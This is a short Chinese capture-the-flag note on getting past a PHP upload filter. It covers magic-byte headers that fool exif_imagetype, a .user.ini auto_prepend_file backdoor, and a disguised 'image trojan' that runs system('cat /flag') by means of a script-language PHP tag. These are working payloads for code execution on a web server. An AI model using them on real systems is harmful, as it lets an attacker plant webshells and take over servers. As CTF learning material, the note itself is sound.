知识盲区:
1.后台通过exif_imagetype函数判断一个图像的类型。可以通过给上传脚本加上相应的幻数头字节就可以绕过:
JPG:FF D8 FF E0 00 10 4A 46 49 46
GIF(相当于文本的GIF89a):47 49 46 38 39 61
PNG:89 50 4E 47
2.user.ini
原理:
.user.ini实际上就是一个可以由用户“自定义”的php.ini,我们能够自定义的设置是模式为“PHP_INI_PERDIR、PHP_INI_USER”的设置。(上面表格中没有提到的PHP_INI_PERDIR也可以在.user.ini中设置)
其中有两个配置,可以用来制造后门:
auto_append_file、auto_prepend_file
指定一个文件,自动包含在要执行的文件前,类似于在文件前调用了require()函数。而auto_append_file类似,只是在文件后面包含。
所以,我们可以借助.user.ini轻松让所有php文件都“自动”包含某个文件,而这个文件可以是一个正常php文件,也可以是一个包含一句话的webshell。
这里就很清楚了,
使用方法很简单,直接写在.user.ini中:
auto_prepend_file=test.jpg
那么当我们访问此目录下的任何一个文件时,都会去包含test.jpg
2.首先制作.user.ini文件。前面要加上GIF89a上传,来绕过检测。GIF89a
auto_prepend_file=test.jpg
3.制作图片马名称为test.jpg:
GIF89a
<script language="php">system("cat /flag");</script>
此处注意:有些题会把含“<?”的文件和过滤掉,所以我们就换个方法制作图片马:注意生成的图片马的名称,要和.user.ini中的配置:auto_prepend_file的值相同。
4.上传成功后直接访问upload目录下的index.php